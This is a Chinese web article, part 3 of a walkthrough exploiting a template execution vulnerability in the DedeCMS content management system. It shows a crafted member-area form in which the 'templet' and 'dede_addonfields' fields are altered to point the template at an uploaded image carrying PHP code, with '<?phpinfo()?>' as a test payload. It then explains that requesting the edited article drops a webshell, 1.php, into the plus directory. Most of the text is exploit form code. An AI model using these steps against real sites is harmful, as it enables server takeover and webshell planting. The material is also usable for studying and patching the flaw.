DEDECMS网站管理系统模板执行漏洞(3)

日期:2020-06-01 栏目:程序人生 浏览:

<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>

<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>

<select name='typeid' size='1'>

<option value='1' class='option3' selected=''>测试栏目</option>

</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>

<select name='mtypesid' size='1'>

<option value='0' selected>请选择分类...</option>

<option value='1' class='option3' selected>hahahha</option>

</select>

<label>信息摘要:</label>

<textarea name="description" id="description">1111111</textarea>

(内容的简要说明)

<label>缩略图:</label>

<input name="litpic" type="file" id="litpic" onchange="SeePicNew('divpicview',this);" maxlength="100" class="intxt"/>

<input type='text' name='templet'

value="../ uploads/userup/2/12OMX04-15A.jpg">

<input type='text' name='dede_addonfields'

value="templet,htmltext;">(这里构造)

</div>

<!-- 表单操作区域 -->

<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">

<input type="hidden" id="body" name="body" value="<div><a href=http://www.dede58.com/"http:/127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank">

<img border="0" alt="" src=http://www.dede58.com/"/anquan/UploadFiles_3093/201008/20100819191753331.jpg" width="1010" height="456" /></a></div>

<p><?phpinfo()?>1111111</p>

" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" />

<iframe id="body___Frame" src=http://www.dede58.com/"/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%"

height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>

<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />

<img src=http://www.dede58.com/"http:/127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle"

style="cursor:pointer" onclick="this.src=this.src+'?'" />

<button class="button2" type="submit">提交</button>

<button class="button2 ml10" type="reset" onclick="location.reload();">重置</button>

</div>

</div>

</form>

 

提交,提示修改成功,则我们已经成功修改模板路径。
 

3.访问修改的文章:

假设刚刚修改的文章的aid为2,则我们只需要访问: 

?aid=2 

即可以在plus目录下生成小马:1.php

上一篇:织梦DEDECMS教程:去除列表页文章标题加粗标签的方法
下一篇:dedecms最新版本修改任意管理员漏洞+getshell+exp

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/eb37964e579cf8dcf0002e1eeb3c3131.html

相关推荐